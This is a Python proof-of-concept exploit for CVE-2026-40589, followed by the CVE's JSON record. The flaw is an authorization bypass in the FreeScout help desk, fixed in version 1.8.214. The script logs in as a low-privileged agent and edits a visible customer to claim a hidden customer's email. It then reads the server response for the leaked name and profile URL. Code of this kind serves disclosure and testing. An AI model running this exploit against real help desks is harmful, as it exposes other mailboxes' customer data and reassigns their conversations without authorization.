CVE-2026-40589

import requests # Target configuration target_domain = "https://example-freescout.com" login_url = f"{target_domain}/login" customer_update_url = f"{target_domain}/customers/{{customer_id}}/update" # Attacker credentials (Low-privileged agent) username = "[email protected]" password = "password" # The email address of a hidden customer from another mailbox hidden_customer_email = "[email protected]" # Create a session to handle cookies session = requests.Session() # 1. Login as the low-privileged agent login_payload = { "email": username, "password": password } login_response = session.post(login_url, data=login_payload) if login_response.status_code == 200: print("[+] Login successful") # 2. Edit a visible customer (Assume ID is 123 for this example) # The attacker adds the hidden customer's email to this visible profile visible_customer_id = "123" update_url = customer_update_url.replace("{customer_id}", visible_customer_id) update_payload = { "first_name": "Visible", "last_name": "Customer", "email": hidden_customer_email, # Injecting the hidden email "_method": "put" } response = session.post(update_url, data=update_payload) # 3. Check for information disclosure # The server response may contain the hidden customer's name and profile URL in the flash message if response.status_code == 200: print("[+] Update request sent.") print("[+] Response content:") print(response.text) # Look for hidden customer details in the response if "Hidden Name" in response.text or "profile" in response.text: print("[!] Vulnerability exploited: Hidden customer information disclosed.") else: print("[-] Information disclosure not detected in immediate response.") else: print(f"[-] Failed to update customer. Status: {response.status_code}") else: print("[-] Login failed")

{"cve": {"id": "CVE-2026-40589", "sourceIdentifier": "[email protected]", "published": "2026-04-21T17:16:56.660", "lastModified": "2026-04-22T21:10:14.290", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "FreeScout is a free self-hosted help desk and shared mailbox. Prior to version 1.8.214, a low-privileged agent can edit a visible customer and add an email address already owned by a hidden customer in another mailbox. The server discloses the hidden customer’s name and profile URL in the success flash, reassigns the hidden email to the visible customer, and rebinds hidden-mailbox conversations for that email to the visible customer. Version 1.8.214 fixes the issue."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:L", "baseScore": 7.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "HIGH", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 4.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-639"}]}], "references": [{"url": "https://github.com/freescout-help-desk/freescout/commit/2e2fe37111d92ac665b9ad8806eac94a1a3e502c", "source": "[email protected]"}, {"url": "https://github.com/freescout-help-desk/freescout/releases/tag/1.8.214", "source": "[email protected]"}, {"url": "https://github.com/freescout-help-desk/freescout/security/advisories/GHSA-mv55-3mgv-fxwr", "source": "[email protected]"}, {"url": "https://github.com/freescout-help-desk/freescout/security/advisories/GHSA-mv55-3mgv-fxwr", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}